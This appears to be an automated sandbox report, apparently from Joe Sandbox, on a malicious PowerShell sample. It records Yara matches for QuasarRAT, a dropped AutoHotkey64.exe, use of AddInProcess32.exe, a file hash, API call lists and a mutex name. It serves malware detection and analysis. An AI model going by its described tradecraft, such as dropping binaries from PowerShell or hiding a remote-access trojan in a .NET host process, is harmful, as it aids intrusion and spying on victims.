Source: Yara match	File source: 0000000B.00000002.1930172049.000000000276B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1927403521.000000000231B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1855061423.0000000002C9B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: AddInProcess32.exe PID: 7564, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AddInProcess32.exe PID: 7576, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AddInProcess32.exe PID: 7624, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AddInProcess32.exe PID: 7760, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AddInProcess32.exe PID: 7768, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AddInProcess32.exe PID: 7788, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AddInProcess32.exe PID: 7804, type: MEMORYSTR

System Summary

Malicious sample detected (through community Yara rule)

Source: 7.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 7.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: QuasarRAT payload Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 7316, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

Powershell drops PE file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\Public\Documents\AutoHotkey64.exe

Jump to dropped file

Sample or dropped binary is a compiled AutoHotkey binary

Source: C:\Users\Public\Documents\AutoHotkey64.exe	Window found: window name: AutoHotkey	Jump to behavior
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Window found: window name: AutoHotkey	Jump to behavior
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Window found: window name: AutoHotkey

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Process Stats: CPU usage > 49%

Source: C:\Users\Public\Documents\AutoHotkey64.exe

Code function: 19_2_000000014006C870: _swprintf,CreateFileW,DeviceIoControl,CloseHandle,

19_2_000000014006C870

Source: C:\Users\Public\Documents\AutoHotkey64.exe

Code function: 19_2_000000014008E640 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,

19_2_000000014008E640

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FFD9B8970FA	0_2_00007FFD9B8970FA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FFD9B897118	0_2_00007FFD9B897118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 6_2_05DE37B0	6_2_05DE37B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 6_2_05DE2EE0	6_2_05DE2EE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 6_2_05DE4A3F	6_2_05DE4A3F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 6_2_05DE2B98	6_2_05DE2B98
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 7_2_01798BE8	7_2_01798BE8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 7_2_01798BD8	7_2_01798BD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 9_2_01218BE8	9_2_01218BE8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 9_2_01218BD8	9_2_01218BD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 10_2_022A8BE8	10_2_022A8BE8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 10_2_022A8BD8	10_2_022A8BD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_025B8BD8	11_2_025B8BD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_025B8BE8	11_2_025B8BE8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 12_2_026F8BE8	12_2_026F8BE8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 12_2_026F8BD8	12_2_026F8BD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 13_2_00B58BE8	13_2_00B58BE8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 13_2_00B58BD8	13_2_00B58BD8
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_00000001400722B0	19_2_00000001400722B0
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_00000001400962C0	19_2_00000001400962C0
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_000000014002A757	19_2_000000014002A757
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_00000001400291A0	19_2_00000001400291A0
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_0000000140063220	19_2_0000000140063220
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_0000000140093390	19_2_0000000140093390
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_000000014002B3D7	19_2_000000014002B3D7
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_0000000140001BAC	19_2_0000000140001BAC
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_00000001400AFEA0	19_2_00000001400AFEA0
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_0000000140062000	19_2_0000000140062000
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_00000001400E5FF4	19_2_00000001400E5FF4
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_0000000140014030	19_2_0000000140014030
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_000000014005E0A0	19_2_000000014005E0A0
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_00000001400A00B0	19_2_00000001400A00B0
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_00000001400DE0A4	19_2_00000001400DE0A4
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_00000001400E00DC	19_2_00000001400E00DC
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_00000001400C80DB	19_2_00000001400C80DB
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_00000001400A60ED	19_2_00000001400A60ED
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_000000014009C110	19_2_000000014009C110
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_00000001400821B0	19_2_00000001400821B0
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_00000001400841F0	19_2_00000001400841F0
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_000000014007C1F0	19_2_000000014007C1F0
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_00000001400CA210	19_2_00000001400CA210
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_00000001400AC210	19_2_00000001400AC210
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_00000001400E820C	19_2_00000001400E820C
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_000000014002A249	19_2_000000014002A249
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_00000001400E62C8	19_2_00000001400E62C8
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_00000001400C8300	19_2_00000001400C8300
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_0000000140006370	19_2_0000000140006370
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_000000014009A380	19_2_000000014009A380
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_0000000140016390	19_2_0000000140016390
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_00000001400703A0	19_2_00000001400703A0
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_000000014008A398	19_2_000000014008A398
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_000000014001C430	19_2_000000014001C430
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_00000001400AA460	19_2_00000001400AA460
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_00000001400684C0	19_2_00000001400684C0
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_000000014006E4C0	19_2_000000014006E4C0
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_000000014007A4E0	19_2_000000014007A4E0
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_000000014006A5A0	19_2_000000014006A5A0
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_00000001400185A0	19_2_00000001400185A0
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_00000001400585E0	19_2_00000001400585E0
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_000000014005C5E0	19_2_000000014005C5E0
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_0000000140064610	19_2_0000000140064610
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_000000014009C66D	19_2_000000014009C66D
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_0000000140082670	19_2_0000000140082670
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_000000014006C670	19_2_000000014006C670
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_000000014009C67C	19_2_000000014009C67C
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_000000014008869E	19_2_000000014008869E
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_00000001400666A0	19_2_00000001400666A0
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_000000014009C698	19_2_000000014009C698
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_000000014009C6BA	19_2_000000014009C6BA
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_000000014009C6DB	19_2_000000014009C6DB
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_000000014009C6E7	19_2_000000014009C6E7
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_000000014009C70D	19_2_000000014009C70D
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_00000001400AE720	19_2_00000001400AE720
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_000000014009C74E	19_2_000000014009C74E
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_000000014002E750	19_2_000000014002E750
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_0000000140092760	19_2_0000000140092760
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_000000014005E760	19_2_000000014005E760
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_00000001400EC78C	19_2_00000001400EC78C
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_00000001400A6788	19_2_00000001400A6788
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_00000001400BE7C0	19_2_00000001400BE7C0
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_000000014009E7F8	19_2_000000014009E7F8
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_0000000140070810	19_2_0000000140070810
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_000000014000280B	19_2_000000014000280B
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_0000000140050830	19_2_0000000140050830
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_00000001400408A3	19_2_00000001400408A3
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_00000001400BC930	19_2_00000001400BC930
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_000000014006C940	19_2_000000014006C940
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_000000014004E970	19_2_000000014004E970
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_000000014007E9B0	19_2_000000014007E9B0
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_00000001400A4A40	19_2_00000001400A4A40
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_00000001400A6A65	19_2_00000001400A6A65
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_0000000140060A80	19_2_0000000140060A80
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_00000001400B8AC0	19_2_00000001400B8AC0
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_0000000140072AE0	19_2_0000000140072AE0
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_000000014005AB10	19_2_000000014005AB10
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_0000000140012C30	19_2_0000000140012C30
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_0000000140042C35	19_2_0000000140042C35
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_00000001400BAC70	19_2_00000001400BAC70
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_00000001400C4C80	19_2_00000001400C4C80
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_0000000140046D49	19_2_0000000140046D49
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_000000014007ED68	19_2_000000014007ED68
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_00000001400ECD70	19_2_00000001400ECD70
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_0000000140058D70	19_2_0000000140058D70
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_00000001400D4DC0	19_2_00000001400D4DC0
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_0000000140098DE0	19_2_0000000140098DE0
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_0000000140076DE0	19_2_0000000140076DE0
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_000000014008AE00	19_2_000000014008AE00
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_0000000140054E30	19_2_0000000140054E30
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_000000014006AE60	19_2_000000014006AE60
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_0000000140064EE0	19_2_0000000140064EE0
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_00000001400A0EF0	19_2_00000001400A0EF0
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_0000000140080F00	19_2_0000000140080F00
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_000000014004CF20	19_2_000000014004CF20
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_000000014005EFD0	19_2_000000014005EFD0
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_0000000140094FD1	19_2_0000000140094FD1
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_000000014000AFE0	19_2_000000014000AFE0
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_0000000140139000	19_2_0000000140139000
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_000000014005D01B	19_2_000000014005D01B
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_000000014007D040	19_2_000000014007D040
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_0000000140013050	19_2_0000000140013050
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_000000014005B090	19_2_000000014005B090
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_00000001400DD098	19_2_00000001400DD098
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_00000001400710D0	19_2_00000001400710D0
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_00000001400570E0	19_2_00000001400570E0
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_0000000140097110	19_2_0000000140097110
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_0000000140059140	19_2_0000000140059140
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_000000014006D142	19_2_000000014006D142
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_000000014008D160	19_2_000000014008D160
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_000000014008B1D0	19_2_000000014008B1D0
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_00000001400E1204	19_2_00000001400E1204
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_00000001400BF220	19_2_00000001400BF220
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_0000000140033270	19_2_0000000140033270
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_0000000140011270	19_2_0000000140011270
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_00000001400A32CB	19_2_00000001400A32CB
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_000000014005D2C8	19_2_000000014005D2C8
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_00000001400A32D9	19_2_00000001400A32D9
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_00000001400A32E4	19_2_00000001400A32E4
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_0000000140079310	19_2_0000000140079310
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_000000014006F320	19_2_000000014006F320
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_000000014005331B	19_2_000000014005331B
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_0000000140087330	19_2_0000000140087330
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_000000014000338D	19_2_000000014000338D
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_00000001400A33A0	19_2_00000001400A33A0
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_00000001400A33B9	19_2_00000001400A33B9
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_00000001400A33C1	19_2_00000001400A33C1
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_00000001400A33D7	19_2_00000001400A33D7
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_0000000140041408	19_2_0000000140041408
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_0000000140047420	19_2_0000000140047420
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_0000000140039420	19_2_0000000140039420
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_000000014004D490	19_2_000000014004D490
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_000000014005B49B	19_2_000000014005B49B
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_00000001400574B0	19_2_00000001400574B0
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_000000014001B4C0	19_2_000000014001B4C0
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_00000001400594E0	19_2_00000001400594E0
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_0000000140043506	19_2_0000000140043506
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_000000014007B510	19_2_000000014007B510
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_00000001400A5570	19_2_00000001400A5570
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_000000014000F570	19_2_000000014000F570
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_000000014001D580	19_2_000000014001D580
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_000000014008958F	19_2_000000014008958F
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_00000001400B55B0	19_2_00000001400B55B0
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_00000001400A95C0	19_2_00000001400A95C0
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_000000014005363B	19_2_000000014005363B
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_0000000140067650	19_2_0000000140067650
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_00000001400A565B	19_2_00000001400A565B
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_00000001400E5668	19_2_00000001400E5668
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_00000001400196C0	19_2_00000001400196C0
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_000000014008D790	19_2_000000014008D790
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_000000014003F799	19_2_000000014003F799
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_000000014001F7C0	19_2_000000014001F7C0
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_000000014004D830	19_2_000000014004D830
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_000000014004B8E0	19_2_000000014004B8E0
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_00000001400158E0	19_2_00000001400158E0
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_0000000140059980	19_2_0000000140059980
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_00000001400A599C	19_2_00000001400A599C
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_0000000140047A15	19_2_0000000140047A15
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_000000014005DA1D	19_2_000000014005DA1D
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_0000000140069A50	19_2_0000000140069A50
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_000000014004FA70	19_2_000000014004FA70
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_0000000140021A90	19_2_0000000140021A90
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_0000000140087AC0	19_2_0000000140087AC0
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_0000000140065AD0	19_2_0000000140065AD0
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_00000001400E3B40	19_2_00000001400E3B40
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_000000014006BB90	19_2_000000014006BB90
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_000000014001DC50	19_2_000000014001DC50
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_000000014005FC80	19_2_000000014005FC80
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_000000014005DC82	19_2_000000014005DC82
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_0000000140055C90	19_2_0000000140055C90
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_000000014009BCA0	19_2_000000014009BCA0
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_0000000140023CA0	19_2_0000000140023CA0
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_000000014008BD90	19_2_000000014008BD90
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_0000000140053D90	19_2_0000000140053D90
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_0000000140099DB3	19_2_0000000140099DB3
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_00000001400DBDB4	19_2_00000001400DBDB4
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_0000000140091DD0	19_2_0000000140091DD0
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_00000001400A5DE1	19_2_00000001400A5DE1
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_0000000140087E30	19_2_0000000140087E30
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_00000001400A3E60	19_2_00000001400A3E60
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_000000014001FE90	19_2_000000014001FE90
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_000000014007FEB0	19_2_000000014007FEB0
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_000000014007DED0	19_2_000000014007DED0
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_0000000140037EE0	19_2_0000000140037EE0
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_000000014006DEF9	19_2_000000014006DEF9
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_0000000140051F50	19_2_0000000140051F50
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_0000000140057F60	19_2_0000000140057F60
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_0000000140065F90	19_2_0000000140065F90

Source: Joe Sandbox View

Dropped File: C:\Users\Public\Documents\AutoHotkey64.exe EFFDEA83C6B7A1DC2CE9E9D40E91DFD59BED9FCBD580903423648B7CA97D9696

Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: String function: 000000014004E5E0 appears 454 times
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: String function: 00000001400D7260 appears 62 times
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: String function: 000000014004E250 appears 62 times
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: String function: 00000001400D6A8C appears 402 times

Source: 7.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 7.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_QuasarRAT author = ditekSHen, description = QuasarRAT payload
Source: Process Memory Space: powershell.exe PID: 7316, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Source: classification engine

Classification label: mal100.troj.spyw.evad.winPS1@28/10@2/2

Source: C:\Users\Public\Documents\AutoHotkey64.exe

Code function: 19_2_000000014004FA70 _swprintf,CreateProcessW,CloseHandle,GetLastError,SetCurrentDirectoryW,GetFileAttributesW,SetCurrentDirectoryW,ShellExecuteExW,GetModuleHandleW,GetProcAddress,CloseHandle,GetLastError,FormatMessageW,

19_2_000000014004FA70

Source: C:\Users\Public\Documents\AutoHotkey64.exe

Code function: 19_2_000000014008E640 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,

19_2_000000014008E640

Source: C:\Users\Public\Documents\AutoHotkey64.exe

Code function: 19_2_000000014006C280 wcsncpy,GetDiskFreeSpaceExW,free,

19_2_000000014006C280

Source: C:\Users\Public\Documents\AutoHotkey64.exe

Code function: 19_2_000000014008E8D0 CreateToolhelp32Snapshot,Process32FirstW,_wcstoi64,Process32NextW,Process32NextW,CloseHandle,CloseHandle,CloseHandle,

19_2_000000014008E8D0

Source: C:\Users\Public\Documents\AutoHotkey64.exe

Code function: 19_2_000000014008ED30 CLSIDFromProgID,CLSIDFromString,CLSIDFromString,CoCreateInstance,CoCreateInstance,

19_2_000000014008ED30

Source: C:\Users\Public\Documents\AutoHotkey64.exe

Code function: 19_2_000000014002AED0 realloc,wcsncpy,CharUpperW,GetFullPathNameW,lstrcmpiW,FindResourceW,LoadResource,LockResource,SizeofResource,FindResourceW,

19_2_000000014002AED0

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\Public\Documents\AutoHotkey64.exe

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7324:120:WilError_03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Mutant created: \Sessions\1\BaseNamedObjects\QSR_MUTEX_nCFXZUEaa8h2uJHNCI

